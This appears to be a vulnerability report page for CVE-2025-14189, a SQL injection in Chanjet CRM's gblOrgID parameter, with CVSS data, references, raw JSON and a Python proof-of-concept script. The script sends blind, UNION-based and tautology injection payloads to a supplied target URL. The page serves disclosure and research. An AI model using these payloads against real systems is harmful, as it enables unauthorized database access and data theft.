Security Vulnerability Report
CVE-2025-14189 CVSS 7.3 HIGH

CVE-2025-14189

Published: 2025-12-07 12:15:48
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was detected in Chanjet CRM up to version 20251121. Affected is an unknown function of the file /tools/jxf_dump_table_demo.php. Manipulation of the argument gblOrgID results in SQL injection. The attack may be performed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Chanjet CRM, all versions prior to 2025-11-21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-14189 SQL Injection PoC for Chanjet CRM
# Target: /tools/jxf_dump_table_demo.php
# Vulnerable Parameter: gblOrgID


def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in Chanjet CRM
    target_url: Base URL of the vulnerable application
    payload: SQL injection payload for gblOrgID parameter
    """
    target = f"{target_url}/tools/jxf_dump_table_demo.php"
    params = {'gblOrgID': payload}
    try:
        response = requests.get(target, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None


# Blind SQL Injection to extract database version
def extract_db_version(target_url):
    """
    Use time-based blind SQL injection to extract database version
    """
    payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1"
    print("[*] Sending payload to extract database info...")
    result = exploit_sqli(target_url, payload)
    return result


# Example: Extract current user
def extract_current_user(target_url):
    """
    Extract current database user using UNION-based injection
    """
    payload = "1' UNION SELECT user(),2,3,4,5-- -"
    result = exploit_sqli(target_url, payload)
    return result


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14189.py <target_url>")
        print("Example: python cve-2025-14189.py http://target.com")
        sys.exit(1)

    target_url = sys.argv[1]
    print(f"[*] Target: {target_url}")
    print("[*] Exploiting CVE-2025-14189...")

    # Test for vulnerability
    test_payload = "1' OR '1'='1"
    result = exploit_sqli(target_url, test_payload)

    if result:
        print("[+] Target appears to be vulnerable!")
    else:
        print("[-] Target may not be vulnerable or is unreachable")

References

https://github.com/hacker-routing/cve/issues/2
https://github.com/hacker-routing/cve/issues/2#issue-3646348225
https://vuldb.com/?ctiid.334609
https://vuldb.com/?id.334609
https://vuldb.com/?submit.699133

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14189",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-07T12:15:47.610",
    "lastModified": "2026-04-29T01:00:01.613",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability was detected in Chanjet CRM up to 20251121. Affected is an unknown function of the file /tools/jxf_dump_table_demo.php. The manipulation of the argument gblOrgID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.4
        }
      ],
      "cvssMetricV2": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "2.0",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "baseScore": 7.5,
            "accessVector": "NETWORK",
            "accessComplexity": "LOW",
            "authentication": "NONE",
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "availabilityImpact": "PARTIAL"
          },
          "baseSeverity": "HIGH",
          "exploitabilityScore": 10.0,
          "impactScore": 6.4,
          "acInsufInfo": false,
          "obtainAllPrivilege": false,
          "obtainUserPrivilege": false,
          "obtainOtherPrivilege": false,
          "userInteractionRequired": false
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-74"},
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/hacker-routing/cve/issues/2", "source": "[email protected]"},
      {"url": "https://github.com/hacker-routing/cve/issues/2#issue-3646348225", "source": "[email protected]"},
      {"url": "https://vuldb.com/?ctiid.334609", "source": "[email protected]"},
      {"url": "https://vuldb.com/?id.334609", "source": "[email protected]"},
      {"url": "https://vuldb.com/?submit.699133", "source": "[email protected]"}
    ]
  }
}